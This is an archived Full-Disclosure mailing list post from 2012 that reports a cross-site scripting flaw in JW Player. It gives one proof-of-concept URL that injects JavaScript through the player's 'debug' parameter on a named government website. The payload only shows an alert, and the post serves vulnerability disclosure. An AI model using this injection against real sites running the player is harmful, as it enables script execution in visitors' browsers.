lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CACFkvQqh-2rkt3wRFPT3rpWDrsxNhM6Fhi=5Ry0SaQqOefEy3w@mail.gmail.com>
Date: Wed, 16 May 2012 14:29:34 +0800
From: WooYun <root@...yun.org>
To: full-disclosure@...ts.grok.org.uk
Subject: JW player xss security flaw

"LongTail Video is a New York-based startup that has pioneered the web
video market. Our flagship product the - JW Player - is active on over
one million websites and streams billions of videos each month."

Someone has reported a xss security flaw of JW Player on wooyun,much
more information here:

http://www.wooyun.org/bugs/wooyun-2010-07166

from: http://www.wooyun.org/whitehats/gainover

a example here:

http://www.wooyun.org/bugs/wooyun-2010-07165

http://www.whitehouse.gov/files/flash/player.swf?debug=function(){var
a=alert;a(1)}

:)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ